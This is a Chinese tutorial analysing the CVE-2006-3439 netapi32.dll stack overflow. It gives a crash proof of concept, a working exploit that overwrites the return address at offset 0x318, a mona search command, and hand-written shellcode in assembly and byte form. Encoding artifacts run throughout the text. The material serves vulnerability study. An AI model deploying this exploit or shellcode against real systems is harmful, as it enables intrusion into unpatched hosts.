通過IDA Pro加載netapi32.dll動態(tài)鏈接庫，來進行分析CVE-2006-3439漏洞產(chǎn)生的原理。

?

?通過IDA全局搜索函數(shù)功能，直接搜索存在問題的NetpwPathCanonicalize函數(shù)，雙擊進行跳轉到NetpwPathCanonicalize函數(shù)位置。

?

?通過動態(tài)分析可以知道漏洞點發(fā)生在下圖中CALL中。

?

?看到在開始sub esp,414h進行開辟?？臻g，它是用來存儲拼接后的字符串。mov ebx，411h進行邊界檢查，查看數(shù)據(jù)是否溢出。漏洞產(chǎn)生原因主要處在wcslen上，wcslen主要是對字符進行計算，類似于strlen函數(shù)，區(qū)別在于wcslen計算的是WCHAR類型，在?？臻g中內容都是以字節(jié)作為計算，用的是ASCII編碼，而wcslen使用的是Unicode編碼，用的是兩個字節(jié)，就是同樣長度的字符串會少算了一半。前面他檢查分411h但是我們可以傳入822h字節(jié)，這個是十六進制的。

看到cmp ax，5ch他就是動態(tài)分析時候進行拼接/。call edi計算path路徑的Unicode長度，結果保存到了eax當中，下邊add eax，esi是把兩個字符串拼接后大小存到eax當中，第二次邊界檢查依然是通過0x411進行檢查，但是它存在問題。上邊prefix不能利用是因為他在外邊進行了二次檢查，而path是可以利用的，因為沒有對他進行檢查，以此可以知道path是可以傳超長字符串，最長可達411h的二倍。因為這里檢查的還是Unicode編碼而不是ASCII編碼。運行下邊函數(shù)他會把path拼接到prefix后面，長度已超過開辟的414h長度，所以造成溢出可以進行利用。

?

CVE-2006-3439漏洞動態(tài)分析

?CVE-2006-3439漏洞有補丁號為KB921883，如果計算機沒有打此補丁，此漏洞就可以利用。

#include
typedef void (*MYPROC)(LPTSTR);
int main()
{??
??? char path[0x320];
??? char can_path[0x440];
??? int maxbuf=0x440;
??? char prefix[0x100];
??? long pathtype=44;
??? //load vulnerability netapi32.dll which we got from a WIN2K sp4 host?
??? HINSTANCE LibHandle;
??? MYPROC Trigger;
??? char dll[ ] = "./netapi32.dll"; // care for the path
??? char VulFunc[ ] = "NetpwPathCanonicalize";
??? LibHandle = LoadLibrary(dll);
??? Trigger = (MYPROC) GetProcAddress(LibHandle, VulFunc);
??? memset(path,0,sizeof(path));
??? memset(path,'a',sizeof(path)-2);
??? memset(prefix,0,sizeof(prefix));
??? memset(prefix,'b',sizeof(prefix)-2);
??? //__asm int 3
??? (Trigger)(path,can_path,maxbuf,prefix ,&pathtype,0);
??? FreeLibrary(LibHandle);
}

?此漏洞出現(xiàn)在netapi32.dll動態(tài)鏈接庫中，是NetpwPathCanonicalize函數(shù)出現(xiàn)了問題，該函數(shù)本身是一個網(wǎng)絡路徑字符串格式化的函數(shù)，Unicode編碼字符串處理功能。(Trigger)(path,can_path,maxbuf,prefix ,&pathtype,0);首先會先看prefix 參數(shù)是不是buffer，如果這個buffer不是空的，那么就把prefix 里面的內容和path路徑里的內容通過一個反斜杠連接起來，連接起來會把他們放到can_path里面。如果prefix 和path越界了或不夠大就有可能直接退出。netapi32.dll動態(tài)鏈接庫是微軟的一個系統(tǒng)庫，可以進行遠程利用。通過memset對path和prefix進行了初始化，首先初始化成了0在對兩個buffer分別用a和b進行覆蓋。因為netapi32.dll動態(tài)鏈接庫中NetpwPathCanonicalize函數(shù)存在問題，所以通過使用GetProcAddress方式拿到他的地址。

?運行代碼他會直接崩掉，可以看到Offset: 61616161是他的溢出地址，正常溢出不會出現(xiàn)這種地址，61是ASCII中a的編碼，所以說返回地址被其中一個buffer給覆蓋掉了。

?

接下來進行動態(tài)分析，首先打開生成的Release可執(zhí)行文件中把NETAPI32.DLL放進去，因為代碼中調用NETAPI32.DL是以相對路徑調用的。

?

?剛進來他是處在系統(tǒng)模塊中，直接F9進入到我們程序當中。

?

看到0040119F地址call ms_06_040.401000就是分析程序的主函數(shù)。主函數(shù)有三個參數(shù)，通過特征可以看他調用call之前進行了三次push，他使用的調用約定是stdcall，stdcall參數(shù)從右至左的順序壓參數(shù)入棧。stdcall和cdecl調用約定都是從右至左的順序壓參數(shù)入棧，區(qū)別在于stdcall需要通過add進行手動平棧而cdecl由系統(tǒng)平棧。

?

此漏洞問題出現(xiàn)在call edx當中。call edx是一個經(jīng)典的函數(shù)指針，因為在編譯的時候edx地址還不確定，它是后覆蓋進去的。

?

直接F8或F9往下走，可以看到它的EBP和EIP都是61616161，說明EBP和EIP都被其中一個buffer給覆蓋了

因為他call edx，在寄存器中可以看到edx他其實就是有漏洞的API函數(shù)。

?

?

直接把edx的地址取出來，ctrl+G跳到NetpwPathCanonicalize里去。

第一次分析的話就要一步一步往下走，看他在哪一個call下飛了，然后就進去分析那個call，過程不做演示，此次直接定位到問題函數(shù)進行分析。

?

?

進入到netapi32.dll中發(fā)現(xiàn)sub esp,414，開辟了一塊很大的空間。mov edi,dword ptr ds:[<&wcslen>]計算了一下長度，其實就是做了一個驗證。

發(fā)現(xiàn)它存在&wcscpy和&wcscat，問題就出現(xiàn)在&wcscat上。wcscpy作用是拷貝字符串到棧里面去。

?

?

首先call dword ptr ds:[<&wcscpy>]進行了call，可以看到他的參數(shù)是從eax來的，而eax值是從[ebp-414]來的，我們直接跳到ebp-414。

?

?通過右鍵->在內存窗口中轉到->轉到ebp-414位置。

可以看到內存中一大片62，最后有兩個00，這個00是初始化時候故意留的兩個，進行了-2操作，有了0000結尾他就是Unicode編碼字符串結尾了。

單步程序到7517FCCC位置他還沒有出現(xiàn)問題。

?

?在執(zhí)行一步發(fā)現(xiàn)0000沒有了，其中一個00被5C覆蓋了，所以這個就是拼接進去一個/，因為這個拼接進去/，導致00被覆蓋，以此這個字符串沒有了結尾。

?

?在此wcscat下邊還存有一個wcscat，直接跳轉過去。

?

?通過觀察內存窗口結尾，目前還是5C00,執(zhí)行完第二個wcscat他會發(fā)生改變。

可以看到wcscat把a拼接到了后面，而且他沒有了0000結束，這個字符串是沒有斷開的，這么復制過來后就出現(xiàn)了問題。這就是他溢出的一個基本原因。可以看到是61把path路徑串給覆蓋了。

?

?通過這個可以知道0012F6A8就是EBP，下邊0012F6AC就是返回地址，0012F294為buffer的起始地址。

?在ret結束位置下斷點跳轉過去，返回地址是0012F6AC，ECX是0012F294為buffer的起始地。所以就可以把prefix或跟path一部分空間直接設置成shellcode。

?

?利用immunity debugger工具mona,在命令行輸入!mona find -s "\xFF\xD1" -m netapi32.dll，此命令意思通過mona查找指定指令call ECS和指定模塊netapi32.dll。結果可以看到有很多地址，目前只記0x751852F9和0x7518AE6C兩個地址。

?

?計算返回地址到起始地址距離，返回地址0012F6AC-0012F294起始地址=0x418 - prefix的100字節(jié) = 0x318，所以就要在0x318的位置上把返回地址進行淹沒。

#include
typedef void (*MYPROC)(LPTSTR);

char shellcode[]=
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
"\x53\x68\x6F\x70\x20\x20\x68\x76\x75\x6c\x74\x8B\xC4\x53\x50\x50"
"\x53\xFF\x57\xFC\x53\xFF\x57\xF8";

int main()
{??
??? char path[0x320];
??? char can_path[0x440];
??? int maxbuf=0x440;
??? char prefix[0x100];
??? long pathtype=44;
??? //load vulnerability netapi32.dll which we got from a WIN2K sp4 host?
??? HINSTANCE LibHandle;
??? MYPROC Trigger;
??? char dll[ ] = "./netapi32.dll"; // care for the path
??? char VulFunc[ ] = "NetpwPathCanonicalize";
??? LibHandle = LoadLibrary(dll);
??? Trigger = (MYPROC) GetProcAddress(LibHandle, VulFunc);
??? memset(path,0,sizeof(path));
??? memset(path,0x90,sizeof(path)-2);
??? memset(prefix,0,sizeof(prefix));
??? memset(prefix,'b',sizeof(prefix)-2);
??? memcpy(prefix,shellcode,168);
??? //0x751852F9
??? path[0x318] = 0xF9;
??? path[0x319] = 0x52;
??? path[0x31A] = 0x18;
??? path[0x31B] = 0x75;
??? //__asm int 3
??? (Trigger)(path,can_path,maxbuf,prefix ,&pathtype,0);
??? FreeLibrary(LibHandle);
}

?通過mona已經(jīng)獲取到了兩個地址0x751852F9和0x7518AE6C，通過計算算出要覆蓋的地址0x318，以字節(jié)形式進行賦值把0x751852F9以小端序方式賦給0x318開始到0x31B位置。目前初始化a已經(jīng)沒有意義，進行全部初始化成0x90為not指令，插入一段shellcode通過memcpy(prefix,shellcode,168);命令，意思是把shellcode代碼拷貝到prefix中一共是168個字節(jié)。

?

?重新編譯完之后再次分析一下，跳到netapi32.dll返回地方可以看到，ESP地址為0x0012F6A8跳轉到堆棧，地址是剛才設置的，ECX地址為0x0012F290棧中指向0x0A6A68FC這個就是shellcode的地址。

?

?跳轉之后發(fā)現(xiàn)發(fā)進行call ecx，現(xiàn)在ecx地址就是shellcode的位置。

?

再次運行跳轉到shellcode位置進行了彈窗。

?

ShellCode編寫

void main()
{
??? _asm{
?????? nop
?????? nop
?????? nop
?????? nop
?????? nop
?????? nop
?????? nop

?????? CLD
?????? push 0x1e380a6a
?????? push 0x4fd18963
?????? push 0x0c917432
?????? mov esi,esp
?????? lea edi,[esi-0xC]
??????
?????? xor ebx,ebx
?????? mov bh,0x04
?????? sub esp,ebx

?????? mov bx,0x3233
?????? push ebx
?????? push 0x72657375
?????? push esp
?????? xor edx,edx

?????? mov ebx,fs:[edx + 0x30]
?????? mov ecx,[ebx + 0x0c]
?????? mov ecx,[ecx + 0x1c]
?????? mov ecx,[ecx]
?????? mov ebp,[ecx + 0x08]

find_lib_functions:
?????? lodsd
?????? cmp eax,0x1e380a6a
?????? jne find_functions
?????? xchg eax,ebp
?????? call [edi - 0x8]
?????? xchg eax,ebp

find_functions:
?????? pushad
?????? mov eax,[ebp + 0x3c]
?????? mov ecx,[ebp + eax + 0x78]
?????? add ecx,ebp
?????? mov ebx,[ecx + 0x20]
?????? add ebx,ebp
?????? xor edi,edi

next_function_loop:
?????? inc edi
?????? mov esi,[ebx + edi * 4]
?????? add esi,ebp
?????? cdq

hash_loop:
?????? movsx eax,byte ptr[esi]
?????? cmp al,ah
?????? jz compare_hash
?????? ror edx,7
?????? add edx,eax
?????? inc esi
?????? jmp hash_loop

compare_hash:
?????? cmp edx,[esp + 0x1c]
?????? jnz next_function_loop
?????? mov ebx,[ecx + 0x24]
?????? add ebx,ebp
?????? mov di,[ebx + 2 * edi]
?????? mov ebx,[ecx + 0x1c]
?????? add ebx,ebp
?????? add ebp,[ebx + 4 * edi]
?????? xchg eax,ebp
?????? pop edi
?????? stosd
?????? push edi
?????? popad

?????? cmp eax,0x1e380a6a
?????? jne find_lib_functions

function_call:
?????? xor ebx,ebx
?????? push ebx
?????? push 0x66666666
?????? push 0x66666666
?????? mov eax,esp
?????? push ebx
?????? push eax
?????? push eax
?????? push ebx
?????? call [edi - 0x04]
?????? push ebx
?????? call [edi - 0x08]
?????? nop
?????? nop
?????? nop
?????? nop
?????? nop
?????? nop
?????? nop
??? }
}

?

?把上邊代碼生成可執(zhí)行文件，通過dbg打開找shellcode位置，下圖為shellcode地址。

進去看到上邊寫的shellcode進行復制，從cld到結尾帶一個not，選擇二進制復制。

把復制出來的shellcode二進制以十六進制文本形成粘貼到010Editor，再以C代碼形式復制出來。

FC 68 6A 0A 38 1E 68 63 89 D1 4F 68 32 74 91 0C 8B F4 8D 7E F4 33 DB B7 04 2B E3 66 BB 33 32 53 68 75 73 65 72 54 33 D2 64 8B 5A 30 8B 4B 0C 8B 49 1C 8B 09 8B 69 08 AD 3D 6A 0A 38 1E 75 05 95 FF 57 F8 95 60 8B 45 3C 8B 4C 05 78 03 CD 8B 59 20 03 DD 33 FF 47 8B 34 BB 03 F5 99 0F BE 06 3A C4 74 08 C1 CA 07 03 D0 46 EB F1 3B 54 24 1C 75 E4 8B 59 24 03 DD 66 8B 3C 7B 8B 59 1C 03 DD 03 2C BB 95 5F AB 57 61 3D 6A 0A 38 1E 75 A9 33 DB 53 68 66 66 66 66 68 66 66 66 66 8B C4 53 50 50 53 FF 57 FC 53 FF 57 F8 90

?

unsigned char shellcode[] = {
??? 0xFC, 0x68, 0x6A, 0x0A, 0x38, 0x1E, 0x68, 0x63, 0x89, 0xD1, 0x4F, 0x68, 0x32, 0x74, 0x91, 0x0C,0x8B, 0xF4, 0x8D, 0x7E, 0xF4, 0x33, 0xDB, 0xB7, 0x04, 0x2B, 0xE3, 0x66, 0xBB, 0x33, 0x32, 0x53,0x68, 0x75, 0x73, 0x65, 0x72, 0x54, 0x33, 0xD2, 0x64, 0x8B, 0x5A, 0x30, 0x8B, 0x4B, 0x0C, 0x8B,0x49, 0x1C, 0x8B, 0x09, 0x8B, 0x69, 0x08, 0xAD, 0x3D, 0x6A, 0x0A, 0x38, 0x1E, 0x75, 0x05, 0x95,0xFF, 0x57, 0xF8, 0x95, 0x60, 0x8B, 0x45, 0x3C, 0x8B, 0x4C, 0x05, 0x78, 0x03, 0xCD, 0x8B, 0x59,0x20, 0x03, 0xDD, 0x33, 0xFF, 0x47, 0x8B, 0x34, 0xBB, 0x03, 0xF5, 0x99, 0x0F, 0xBE, 0x06, 0x3A,0xC4, 0x74, 0x08, 0xC1, 0xCA, 0x07, 0x03, 0xD0, 0x46, 0xEB, 0xF1, 0x3B, 0x54, 0x24, 0x1C, 0x75,0xE4, 0x8B, 0x59, 0x24, 0x03, 0xDD, 0x66, 0x8B, 0x3C, 0x7B, 0x8B, 0x59, 0x1C, 0x03, 0xDD, 0x03,0x2C, 0xBB, 0x95, 0x5F, 0xAB, 0x57, 0x61, 0x3D, 0x6A, 0x0A, 0x38, 0x1E, 0x75, 0xA9, 0x33, 0xDB,0x53, 0x68, 0x66, 0x66, 0x66, 0x66, 0x68, 0x66, 0x66, 0x66, 0x66, 0x8B, 0xC4, 0x53, 0x50, 0x50,0x53, 0xFF, 0x57, 0xFC, 0x53, 0xFF, 0x57, 0xF8, 0x90
};

?

CVE-2006-3439遠程利用

?

受害者

?

攻擊者

漏洞利用

?